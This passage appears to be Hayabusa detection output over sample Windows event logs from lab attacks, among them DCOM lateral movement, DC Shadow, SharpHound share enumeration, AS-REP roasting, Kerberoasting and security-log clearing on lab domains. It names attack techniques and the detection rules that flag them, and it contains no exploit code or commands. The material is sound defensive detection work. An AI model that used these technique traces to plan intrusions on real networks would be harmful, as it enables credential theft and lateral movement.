Instrumentation/ID1-WMIexec process execution.evtx +2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47450 : LogonID: 0x5429550,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-27 00:16:03.992 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 34544 : LogonID: 0x542957e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-27 00:16:04.284 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 45246 : LogonID: 0x542a072,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-27 20:04:13.291 +09:00,rootdc1.offsec.lan,5136,high,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" +2021-04-27 20:04:53.341 +09:00,rootdc1.offsec.lan,5136,high,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" +2021-04-27 23:54:29.317 +09:00,webiis01.offsec.lan,5140,informational,Network Share Access,User: admmig 
: Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:54:31.493 +09:00,pki01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:54:49.355 +09:00,webiis01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:54:51.591 +09:00,pki01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:28.669 +09:00,mssql01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:34.819 +09:00,atanids01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: 
\\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:45.042 +09:00,exchange01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:45.392 +09:00,adfs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:46.789 +09:00,fs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:47.449 +09:00,prtg-mon.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:48.746 +09:00,mssql01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : 
Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:49.695 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:50.629 +09:00,atacore01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:54.886 +09:00,atanids01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:05.147 +09:00,exchange01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:05.466 +09:00,adfs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : 
Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:06.878 +09:00,fs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:07.557 +09:00,prtg-mon.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:09.605 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:10.730 +09:00,atacore01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:17.723 +09:00,fs02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: 
null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:17.762 +09:00,dhcp01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:17.790 +09:00,wsus01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:17.920 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:18.001 +09:00,win10-02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:20.658 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: 
\??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:30.691 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.825 +09:00,fs02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.866 +09:00,dhcp01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.904 +09:00,wsus01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.916 
+09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.917 +09:00,win10-02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:40.730 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:50.745 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:04:00.785 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 
10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:04:10.808 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-29 16:55:53.423 +09:00,DC-Server-1.labcorp.local,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.433 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::ffff:192.168.1.2 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.435 +09:00,DC-Server-1.labcorp.local,4672,informational,Admin Logon,User: Bob : LogonID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.436 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Bob : Workstation: : IP Address: 192.168.1.2 : Port: 54633 : LogonID: 
0xc66373,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.681 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::ffff:192.168.1.2 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4672,informational,Admin Logon,User: Bob : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Bob : Workstation: : IP Address: 192.168.1.2 : Port: 54635 : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,medium,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,informational,Kerberos TGT was requested,User: Alice : Service: krbtgt : IP Address: ::ffff:192.168.1.2 : Status: 0x0 : PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.980 
+09:00,DC-Server-1.labcorp.local,4634,informational,Logoff,User: Bob : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:02.652 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54374 : LogonID: 0xc712f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:02.666 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: 192.168.1.100 : Port: 54375 : LogonID: 0xc7142b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:02.761 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54376 : LogonID: 0xc714d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:28.422 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: DC-SERVER-1$@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:28.425 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : 
Port: 54379 : LogonID: 0xc7313f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:59:42.537 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54388 : LogonID: 0xc7adb8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:59:42.545 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54389 : LogonID: 0xc7ae25,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 18:23:54.244 +09:00,DC-Server-1.labcorp.local,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.690 +09:00,DC-Server-1.labcorp.local,4776,informational,NTLM Logon to Local Account,User: Alice : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.691 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Alice : Workstation: : IP Address: 192.168.1.200 : Port: 40316 : LogonID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge 
Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,medium,Kerberoasting,Possible Kerberoasting Risk Activity.,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_Kerberoasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,informational,Kerberos TGT was requested,User: Alice : Service: krbtgt : IP Address: ::ffff:192.168.1.200 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.726 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Alice@LABCORP.LOCAL : Service: sql101 : IP Address: ::ffff:192.168.1.200 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.735 +09:00,DC-Server-1.labcorp.local,4634,informational,Logoff,User: Alice : LogonID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-05-03 17:16:43.008 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM domain users & groups discovery.evtx +2021-05-03 17:16:43.017 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups 
Discovery/ID4661-SAM domain users & groups discovery.evtx +2021-05-03 17:58:25.921 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62173 : LogonID: 0x88f313a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:25.942 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62188 : LogonID: 0x88f3141d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:25.949 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62190 : LogonID: 0x88f31435,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:25.950 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62194 : LogonID: 0x88f31447,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.674 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62169 : LogonID: 
